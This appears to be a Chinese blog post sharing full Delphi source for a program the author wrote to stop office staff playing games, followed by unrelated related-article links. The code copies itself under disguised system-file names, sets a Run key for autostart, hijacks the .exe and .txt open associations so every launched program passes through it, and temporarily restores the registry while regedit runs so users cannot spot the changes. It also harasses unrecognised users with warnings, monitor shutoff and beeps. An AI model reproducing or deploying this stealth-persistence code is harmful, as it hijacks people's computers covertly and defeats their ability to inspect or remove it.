偶然翻到很久以前用DELPHI写的一个小程序,实现功能是在后台默默关闭符合条件的进程,并隐藏自身。编写目的是为了防止办公电脑运行游戏。

实现原理是:

1、程序运行后将自身以不同的名称一式三份存到系统各目录中,将其中一个COPY写到注册表里开机自启动,然后修改注册表中txt文件和exe文件打开方式分别指向另两个COPY,达到监控目的。

2、程序一但激活首先会确认各COPY是否存在以及注册表关联是否正常,然后再检查系统是否运行在禁止名单中的进程,发现就杀死。

3、如果程序监控到用户运行regedit则会将注册表改回正常值,当regedit退出后再将修改写回,以防用户发现。(这在杀毒软件还很落后的年代效果还是相当好的)

4、程序保留了卸载的功能,代码里有写。

自己感觉挺有意思,把代码发上来留个纪念。

 //为了防止一些人上班就玩游戏的恶习所编

 program HK;

 uses

   Windows,

   Messages,

   SysUtils,

   System,

   Classes,

   Registry,

   Forms,

   Controls,

   LoadDLL in 'LoadDLL.pas';

 var

   I:Integer;

   SPath,WPath:PCHAR;

   pa:string;

   hnd: THandle;

   sp:boolean;

   sFileName:String;

 //function RegisterServiceProcess(dwProcessId, dwServiceType: DWord): Bool; stdcall;

 //function RegisterServiceProcess; external 'Kernel32.dll' Name 'RegisterServiceProcess';

 procedure procRun(exeName,exePath:PChar;trace:boolean);

 var

   SUInfo: TStartupInfo;

   ProcInfo: TProcessInformation;

 begin

 FillChar(SUInfo, SizeOf(SUInfo), #);

 with SUInfo do

   begin

     cb := SizeOf(SUInfo);

     dwFlags := STARTF_USESHOWWINDOW;

     wShowWindow :=;

   end;

 if CreateProcess(NIL,exeName, NIL, NIL, FALSE,CREATE_NEW_CONSOLE or NORMAL_PRIORITY_CLASS, NIL,exePath, SUInfo, ProcInfo) then

   begin

     if trace then

       WaitForSingleObject(ProcInfo.hProcess, INFINITE);

     CloseHandle(ProcInfo.hProcess);

     CloseHandle(ProcInfo.hThread);

   end;

 end;

 procedure procSetReg(rest:boolean);

 var

    Reg:TRegistry;

 begin

    Reg:=Tregistry.Create;

    try

    if rest then

    begin

      reg.rootkey:=HKEY_CLASSES_ROOT;

      if reg.OpenKey('\txtfile\shell\open\command',true) then

         reg.WriteExpandString('',WPath+'\NOTEPAD.exe %1');

      reg.closekey;

      if reg.OpenKey('\exefile\shell\open\command',true) then

         reg.WriteExpandString('','"%1" %*');

      reg.closekey;

      reg.RootKey:=HKEY_LOCAL_MACHINE;

      if reg.openkey('\Software\Microsoft\Windows\CurrentVersion\Run',True) then

         reg.DeleteValue('SysOleRun');

       reg.closekey;

    end

    else

    begin

       reg.RootKey:=HKEY_LOCAL_MACHINE;

       if reg.openkey('\Software\Microsoft\Windows\CurrentVersion\Run',True) then

           reg.writestring('SysOleRun',spath+'\ObjDDC.exe');

       Reg.CloseKey;

       reg.rootkey:=HKEY_CLASSES_ROOT;

       if reg.OpenKey('\txtfile\shell\open\command',true) then

           reg.WriteExpandString('',spath+'\WinODBC.exe %1');

       reg.closekey;

       if reg.OpenKey('\exefile\shell\open\command',true) then

           reg.WriteExpandString('',spath+'\OLEDevice.exe %1 %*');

       reg.closekey;

    end;

   finally

     Reg.Free;

   end;

 end;

 procedure BeepEx(feq:word=;delay:word=);

   procedure BeepOff;

    begin

      asm

        in al,$;

        and al,$fc;

        out $,al;

      end;

   end;

 const

   scale=;

 var

   temp:word;

 begin

   temp:=scale div feq;

   asm

     in al,61h;

     or al,;

     out 61h,al;

     mov al,$b6;

     out 43h,al;

     mov ax,temp;

     out 42h,al;

     mov al,ah;

     out 42h,al;

   end;

   sleep(delay);

   beepoff;

 end;

 procedure UserPass();

 var

    a,b:integer;

    t:longword;

    UserName:PCHAR;

 begin

    if sp then

       begin

        t:=;

       GetMem(UserName,);

       try

         getusername(UserName,t);

         if UserName<>'lykyl' then

           begin

              messagebox(,'非法用户,操作限制!','系统警告!',MB_OK);

              for a:= to  do

               begin

               SendMessage(, WM_SYSCOMMAND, SC_MONITORPOWER, );

                for b:= to  do

                  begin

                       BeepEx(,);

                       beepex(,);

                  end;

                SendMessage(, WM_SYSCOMMAND, SC_MONITORPOWER, -);

                messagebox(,'非法用户身份确定','系统警告!',MB_OK);

               end;

           end;

         finally

           freemem(UserName);

         end;

       end;

 end;

   {$R *.RES}

 begin

    hnd := CreateMutex(nil, True, 'irgendwaseinmaliges');

    if GetLastError = ERROR_ALREADY_EXISTS then

       sp:=false

    else

       sp:=true;

   //RegisterServiceProcess(, RSP_SIMPLE_SERVICE);

   GetMem(SPath,);

   GetMem(WPath,);

   GetSystemDirectory(SPath,);

   GetWindowsDirectory(WPath,);

   SetLength(sFileName,);

   GetModuleFileName(GetCurrentProcess,Pchar(sFileName),);

   sFileName:=Pchar(sFileName);

   try

     if ExtractFileName(sFileName)='lykyl.exe' then

        procSetReg(true)

     else

     begin

     Copyfile(pchar(sFileName),pchar(spath+'\WinODBC.exe'),false);

     Copyfile(pchar(sFileName),pchar(spath+'\OLEDevice.exe'),false);

     Copyfile(pchar(sFileName),pchar(WPath+'\ObjDDc.exe'),false);

     procSetReg(false);

     for i:= to ParamCount do

         if i= then

            pa:=ParamStr(i)

         else

            pa:=pa+' '+ParamStr(i);

     if Pa <>'' then

       begin

           if ExtractFileName(sFileName)='WINODBC.EXE' then

             begin

               UserPass();

               procRun(PChar(WPath+'\NOTEPAD.EXE '+pa),PChar(ExtractFilePath(WPath+'\')),false);

             end

           else

               if ExtractFileName(sFileName)='OLEDEVICE.EXE' then

                begin

                   UserPass();

                   if AnsiStrPos(pchar(pa),'regedit')<>nil then

                      begin

                           procSetReg(true);

                           procRun(PChar(pa),PChar(ExtractFilePath(pa)),true);

                           procSetReg(false);

                      end

                   else

                      begin

                          procRun(PChar(pa),pchar(extractfilepath(pa)),false);

                      end;

                end;

       end;

       end;

   finally

     freemem(SPath);

     freemem(WPath);

     if hnd <>  then CloseHandle(hnd);

 //    RegisterServiceProcess(, RSP_UNREGISTER_SERVICE);

   end;

 end.

DELPHI实现关闭指定进程,自身防杀的更多相关文章

  1. Delphi 中关闭指定进程的方法

    Uses Windows, SysUtils, Tlhelp32 ; Function KillTask( ExeFileName: String ): Integer ; //关闭进程 Functi ...

  2. mac查看当前调用tcp的进程并关闭指定进程

    查看所有tcp进程 监听的端口 lsof -iTCP -sTCP:LISTEN 查看指定端口信息 lsof -i: 关闭指定进程 kill -

  3. Shell 关闭指定进程

    例如要关闭jupyter-notebook这个进程: - | 说明:管道符“|”用来隔开两个命令,管道符左边命令的输出会作为管道符右边命令的输入. “ps -ef” 查看所有进程 “grep -v g ...

  4. shell关闭指定进程

    例如要关闭jupyter-notebook这个进程: ps -ef | grep jupyter-notebook | grep -v grep | cut -c 9-15 | xargs kill ...

  5. C#如何关闭指定进程

    public static void KillProcess(string strProcessesByName)//关闭线程 { foreach (Process p in Process.GetP ...

  6. Inno Setup安装时不能关闭指定进程

    脚本由 Inno Setup 脚本向导 生成!; 有关创建 Inno Setup 脚本文件的详细资料请查阅帮助文档! #define MyAppName "XX管理系统"#defi ...

  7. 性能优化-service进程防杀

    service作为后台服务,其重要性不言而喻,但很多时候service会被杀死,从而失去了我们原本想要其发挥的作用,在这种情况下我们该如何确保我们的service不被杀死就是本节需要讨论的内容了 se ...

  8. 使用VC++通过远程进程注入来实现HOOK指定进程的某个API

    前阵子读到一篇关于<HOOK API入门之Hook自己程序的MessageBoxW>的博客,博客地址:http://blog.csdn.net/friendan/article/detai ...

  9. Inno Setup 系列之安装、卸载前检测进程运行情况并关闭相应进程

    需求 最近用 Inno Setup 做一个exe,可是在安装之前要停止正在运行的相应进程或者在卸载之前要停止正在运行的相应进程,可是发现它自身的方法不能满足要求,最后经过度娘的耐心帮助下终于在网上找到 ...

随机推荐

  1. .NET实现微博粉丝服务平台接口

    [文章摘要]Senparc.Weixin.MP虽然是微信公众号的SDK,但由于易信公众号和新浪微博粉丝服务平台也提供了微信兼容接口,所以也可以使用其快速实现相应的服务,当然微博由于与微信存在差异,如果 ...

  2. rem单位和em单位的使用

    今天弄了一点响应式的东西,本以为很快就可以弄好,结果还是绕晕了头,所以还是写下来方便下次看吧! 一开始我打算用百分比%来做响应式布局,后来算的很懵圈,就果断放弃了,哈哈是不是很明智. 接下来就是rem ...

  3. 传智播客--高级控件--showdialog关闭(小白内容)

    以往我在WPF里,用ShowDialog展示出一个页面,一般都是用Close()进行关闭. 今天看传智播客的视频时,了解到还能直接给DialogResult一个TRUE或者false的属性,使页面关闭 ...

  4. 《JS设计模式笔记》 4,桥接模式

    //桥接模式的作用在于将实现部分和抽象部分分离开来,以便两者可以独立的变化. var singleton=function(fn){ var result; return function(){ re ...

  5. .NET平台机器学习资源汇总,有你想要的么?

    接触机器学习1年多了,由于只会用C#堆代码,所以只关注.NET平台的资源,一边积累,一边收集,一边学习,所以在本站第101篇博客到来之际,分享给大家.部分用过的 ,会有稍微详细点的说明,其他没用过的, ...

  6. 【开源】OSharp3.0框架解说系列(6.2):操作日志与数据日志

    OSharp是什么? OSharp是个快速开发框架,但不是一个大而全的包罗万象的框架,严格的说,OSharp中什么都没有实现.与其他大而全的框架最大的不同点,就是OSharp只做抽象封装,不做实现.依 ...

  7. AngularJS之Directive(三)

    前言 angular核心部分如下图几大块,最重要的莫过于指令这一部分,本文将重点讲解指令这一部分,后续笔者将通过陆续的学习来叙述其他如:factory.service等,若有叙述错误之处,欢迎各位指正 ...

  8. WebService中使用Aspose.Cells.dll

    首先,目前我是在Json里面使用的,然后关于HTML+WebService+Json怎么使用,可以看看Jsonp跨域的相关例子. 本次的实现原理是:通过HTML传送参数到WebService,然后在W ...

  9. linux下的常用命令

    1 fg切换前后台作业 将后台作业转换为前台作业,”fg %作业号“ 2 stty改变和打印终端行设置 tostop 阻止后台作业写终端,stty -a显示终端的所有选项 3 uname查看机子信息 ...

  10. 1Z0-053 争议题目解析688

    1Z0-053 争议题目解析688 考试科目:1Z0-053 题库版本:V13.02 题库中原题为: 688.Which two statements are true about the compr ...